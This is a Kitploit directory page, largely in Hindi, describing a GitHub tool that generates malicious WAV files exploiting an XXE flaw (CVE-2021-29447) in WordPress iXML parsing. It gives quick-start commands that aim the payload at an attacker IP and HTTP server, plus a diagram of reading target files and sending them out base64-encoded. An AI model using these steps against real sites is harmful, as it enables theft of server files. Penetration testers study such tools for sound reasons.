Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447 — A XXE payload generator | Kitploit
उपकरण/GitHubGitHub/0xricksanchez/cve-2021-29447
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationWeb Security
GitHub0xricksanchez/cve-2021-29447

CVE-2021-29447

A XXE payload generator

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WAV iXML XXE एक्सप्लॉइट जनरेटर

दुर्भावनापूर्ण WAV फ़ाइलें उत्पन्न करता है जो iXML मेटाडेटा चंक्स को पार्स करने वाले WordPress प्लगइन्स में XXE कमजोरियों का शोषण करती हैं (जैसे, BookingPress < 1.0.11)।

त्वरित आरंभ

root@kitploit:~
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d

कार्यप्रवाह

root@kitploit:~
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │

संवेदनशील लक्ष्य

  • WordPress BookingPress प्लगइन < 1.0.11
  • कोई भी एप्लिकेशन जो बाहरी एंटिटी को अक्षम किए बिना WAV फ़ाइलों में iXML चंक्स को पार्स करता है

संदर्भ

  • WPScan कमजोरी डेटाबेस
  • CVE: CVE-2021-29447
टूल डाउनलोड करें